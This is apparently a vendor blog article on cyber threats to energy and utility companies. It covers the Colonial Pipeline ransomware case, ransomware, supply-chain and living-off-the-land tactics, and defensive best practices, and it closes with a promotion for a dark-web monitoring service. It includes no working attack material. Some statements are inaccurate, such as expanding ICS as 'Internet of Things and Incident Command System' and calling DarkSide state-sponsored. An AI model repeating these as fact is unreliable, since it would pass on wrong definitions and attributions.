Fuel, Flow, and Firewall: Securing the Digital Backbone of Energy and Utilities

Table of Contents

The energy and utilities sector is a multi-faceted mix of oil, natural gas, renewables, and electricity. The resources needed to manage and govern these essential national services create a critical infrastructure (CI). As a fundamental part of a coherent society, global energy and power plant networks offer a salacious opportunity for cybercriminals to wreak havoc, causing widespread power outages, data exposure, and financial losses.

Check Point Research highlighted the surging threat to critical infrastructure assets, identifying a 70% increase in attacks on U.S. utilities. Cybercriminals will increasingly exploit energy and utilities to cause damage, steal intellectual property (IP) and other data, and extort money. As the industry continues to integrate operational technology with information technology (IT/OT), these threats become an ever-present danger.

Protecting Critical Infrastructures: Colonial Pipeline Case Study

In early May 2021, U.S. pipeline operator Colonial Pipeline became a victim of a major ransomware attack by hacking group DarkSide. The company is responsible for around 45% of all fuel consumed on the East Coast of the U.S. The attack caused chaos. Attackers stole over 100 gigabytes of data, and the company was forced to shut down 5,500 miles of pipeline. Over 1,000 gas stations ran out of fuel. To mitigate the impact on customers, Colonial paid the ransom, around $5 million in bitcoin.

An archived press release from the company stated:

"In response (to the attack), we proactively took certain systems offline to contain the threat, which has temporarily halted all pipeline operations and affected some of our IT systems."

The attack chain of events identified unauthorized initial access via a legacy VPN using a compromised password. Notably, VPN access did not enforce multi-factor authentication (MFA).

Joseph Blount, President and CEO of Colonial Pipeline Company, testified to the U.S. Congress on 8 June 2021 and explained the critical point of the attack: "We believe the attacker exploited a legacy VPN profile that was not intended to be in use."

Thanks to an FBI investigation, $4.4 million of the ransom paid to DarkSide was recovered. However, the damage to the company's reputation and customers resulted in class actions by affected fuel retailers. The U.S. Department of Transportation's Pipeline and Hazardous Materials Safety Administration submitted nearly $1 million in civil penalties for noncompliance.

Top Cybersecurity Threats to Energy and Utilities

KnowBe4 highlights the volume of threats against energy and utility firms, the company identifying 420 million attacks, equating to 13 attacks per second, on critical infrastructure companies. Threats are so high that KnowBe4 describes critical infrastructure as being "under siege".

These findings are reflected in Check Point Research data, showing the extent of attacks affecting CI companies:

Average Weekly Cyber Attacks Per Organization in U.S.

Source: Check Point Research

Renewables are compounding issues by increasing the attack surface. The FBI warned that residential input to the grid adds new attack points and weaknesses. The warning states that "a cyberattack against a solar panel system, residential or commercial, would likely focus on targeting the system's operational technology (OT) software and hardware; specifically, malicious cyber actors could attempt to gain control over a solar panel system through the inverters".

Energy and utility firms increasingly rely on IoT and ICS (Internet of Things and Incident Command System). These points of connectivity open doors for cybercriminals intent on damage and extortion. These attacks take many forms and include the following techniques and tactics:

Smart Infrastructure Vulnerabilities

Smart infrastructure vulnerabilities offer cybercriminals exploitation points. Advanced metering infrastructure (AMI), as used by utilities in devices like smart meters, is increasing the attack surface and affecting customers. An academic paper from Purdue University researchers explores the AMI's attack surface. The researchers give an example of how an AMI cyberattack may use intelligence gathering to identify vulnerable targets for malware infection, exfiltrate data from various attack points, and capture control of the system.

North American Electric Reliability Corporation has identified several weak spots in electrical networks, showing that the networks' susceptibility and weaknesses are growing year over year.

Unpatched ICS Vulnerabilities

Hackers exploit vulnerabilities in Industrial Control Systems (ICS) to gain unauthorized access. The U.S. cyber defense agency, CISA, regularly publishes warnings on security issues and vulnerabilities affecting ICS.

Supply Chain Attacks

Energy and utilities are vulnerable to supply chain attacks, according to analysis by KPMG and Security Scorecard. The study shows that 45% of security breaches in the energy sector were due to third-party vulnerabilities.

The SolarWinds breach exemplifies how supply chain attacks can impact multiple energy companies. The backdoor attack on the SolarWinds monitoring platform Orion affected 25% of the electric utilities on the North American power grid.

Ransomware

State-sponsored ransomware gangs like Darkside target critical infrastructure suppliers for geopolitical reasons and extortion. The ransomware problem in energy and utilities is severe, with a CI threat report from Sophos finding that 67% of respondents said their organizations had suffered a ransomware attack. The mean cost to energy, oil/gas, and utilities organizations to recover from a ransomware attack is $3.12 M. Initial access typically uses a spear phishing email and MFA bypass methods to break extra authentication security.

Halliburton, a U.S. oil supplier, was a victim of a ransomware attack. The ransomware gang, known as RansomHub, exfiltrated a large volume of data before placing it on its dark web leak site, using it as leverage to extort the ransom payment. Halliburton breach-related losses are around $35 million.

Living-Off-The-Land (LOTL)

LOTL is an exploitation involving legitimate, built-in administrative tools, like PowerShell and PsExec. Initial access is usually via a phishing email. Cybercriminals then use vulnerabilities in these tools to execute an attack without alerting monitoring tools. They can then move laterally within the OT network, escalating privileges, again using legitimate network tools. Once hackers have enough privileges, they can initiate malicious scripts to alter programmable logic controller (PLC) settings within industrial environments to manipulate critical processes. Russia-linked hacking gang Sandworm used LOTL to attack a Ukrainian critical infrastructure organization.

Why Are Energy and Utilities Firms Targeted?

The connected OT ecosystem is a core focus for attackers. Supervisory Control and Data Acquisition (SCADA) connected networks are incredibly tempting for threat actors. The convergence of OT/IT provides an exploitable surface where cybercriminals can gain unauthorized access and control. The most common reasons for taking control of energy and utilities organizations are for the following reasons:

Political attacks and cyber espionage

Global tensions are mounting, leading to state-sponsored threat actors' attacks on CI (critical infrastructure). The Microsoft Digital Defense Report found increased reports of attacks on internet-exposed, poorly secured OT devices that control real-world critical processes. The causes were unpatched components and default passwords. The U.S. NERC warns that "geopolitical conflict, including Russia's invasion of Ukraine and the war in Gaza, has dramatically increased the number of threats to North American power grids".

Examples include in the USA, internet-exposed OT equipment in water and wastewater systems being targeted in multiple attacks by pro-Russian, state-sponsored threat actors.

Financial exploitation

Cybercriminals weaponize critical infrastructures to extort large ransoms. Resecurity researchers have described how this tactic is driving ransomware operators targeting energy firms to increase their extortion demands beyond $7 million.

Data

Energy and utilities hold valuable data, including customer and company-sensitive information. The Thales Data Threat report found that 42% of critical infrastructure companies, including those in the energy sector, suffered data breaches.

AI in Energy and Utilities

The blooming AI landscape is bringing cybersecurity benefits to the energy sector. However, AI is also being used for adversarial reasons. A recent report from the U.S. Department of Energy on the benefits and risks of AI within critical infrastructures. The report points out that while AI and machine learning can be used for benefits such as optimizing controls and predictive maintenance, AI can also be used in adversarial attacks. The report describes various AI-enabled attacks, including data extraction, AI supply chain attacks, and autonomous malware.

Read more on the adversarial potential of AI on critical infrastructures: "Potential Benefits and Risks of Artificial Intelligence for Critical Energy Infrastructure".

Cybersecurity Regulatory Compliance and Guidance for Energy and Utilities

Federal and industry regulations and standards cover the energy and utilities sector. Some examples include the following:

  • NIST Cybersecurity Framework: Cybersecurity Framework | NIST
  • Sector-specific standards: For example, NERC CIP covers the electricity subsector, and the U.S. Environmental Protection Agency (EPA) offers cybersecurity guidance for water suppliers
  • Department of Energy (DOE) Office of Cybersecurity, Energy Security, & Emergency Response (CESER): - Check out the draft Interim Implementation Guidance to assist utilities in adopting Cybersecurity Baselines
  • Energy Modernization Cybersecurity Implementation Plan (EMCIP): The EMCIP plan details 32 high-impact initiatives that, when implemented, help to achieve a more secure energy ecosystem.

Search for federal energy laws using the Department of Energy's searchable database.

Mitigating Cybersecurity Risks: Best Practices

The energy and utilities sector requires a defense-in-depth approach to tackling increasing attacks targeting critical infrastructures:

Robust Identity Management

Unauthorized access to OT/IT resources is behind many cyberattacks on the sector.To mitigate identity security-focused attacks, enforce the principle of least privilege (PoLP) to ensure access is controlled on a need-to-know basis. The use of Just-in-Time (JiT) access limits access to only when needed. Add in phishing-resistant MFA to prevent multi-factor authentication bypass tactics. Use Privileged Access Management (PAM) from vendors like One Identity to manage access privileges.

Train Your Team

Security awareness training is essential to cybersecurity preparedness. Educating staff and associates on the tactics used by cybercriminals to manipulate behavior and on security hygiene issues like safe password use helps to create a culture of security. Vendors like TitanHQ specialize in behavior-led security awareness training.

Network Segmentation

By segmenting areas within an OT network, a critical infrastructure organization can isolate areas to contain the spread of a cyberattack.

Update Software

Ensure that your software and firmware are patched and up-to-date to prevent vulnerability exploitation. Always change default passwords on IoT devices to something more secure, and where possible, use MFA.

Dark Web Monitoring

Services like Sentinex help enable an energy and utilities organization to identify threats lurking on the dark web. This includes locating potentially stolen company and customer data and potential threats to the organization.

Get Cyber Insurance

Cyber insurance can help with costs after a cyberattack. Insurance may cover losses associated with failure to supply, fines, noncompliance outcomes, enforced shutdowns, property damage, etc. Some cyber insurers, like Canopius, offer specialist coverage for utilities.

Monitor and Detect

IDS tools monitor network traffic in real-time, looking for unusual or anomalous activity that may signal a cyberattack. Monitoring tools for IOT networks help to identify these anomalous patterns across external remote connections that could signal a cyberattack. Web application firewalls (WAFs) are another tool to control network traffic between zones within an OT network and help prevent unauthorized access to critical assets.

Review the Security Posture of Connected Third-Party Suppliers

Supply chain attacks are used to exploit critical infrastructure organizations. Put robust supply chain risk management processes in place, checking the security posture of each vendor.

Create a Response and Recovery Plan

If the worst-case scenario does occur, having a well-thought-out response and recovery plan can help mitigate the attack. A response plan is a written document that outlines the steps to contain and mitigate the attack. The U.S. Cybersecurity and Infrastructure Security Agency (CISA) offers some guidelines for creating an effective plan.

CISA has also created the Crisis Event Response and Recovery Access (CERRA) Framework to help CI organizations in developing a robust response plan that involves external authorities.

The Dark Web and Energy and Utilities

Initial access brokers (IABs) and ransomware actors use dark web forums and groups to discuss methods to compromise industrial systems. Cybercriminals use the dark web to share intelligence on exposed SCADA systems or zero-day vulnerabilities to exploit IoT devices and OT networks.

A small advisory firm recently used Sentinex dark web monitoring tools to flag a leak of 2,000 data records. The tools identified the exposed data within hours. The company used Sentinex to lock the data from further exposure, helping it avoid a $400K loss. Sentinex helps secure data further by providing encrypted file sharing and real-time threat alerts; read more on the company's FAQ. Sentinex provides proactive cybersecurity, stopping threats from becoming incidents.

Table of Contents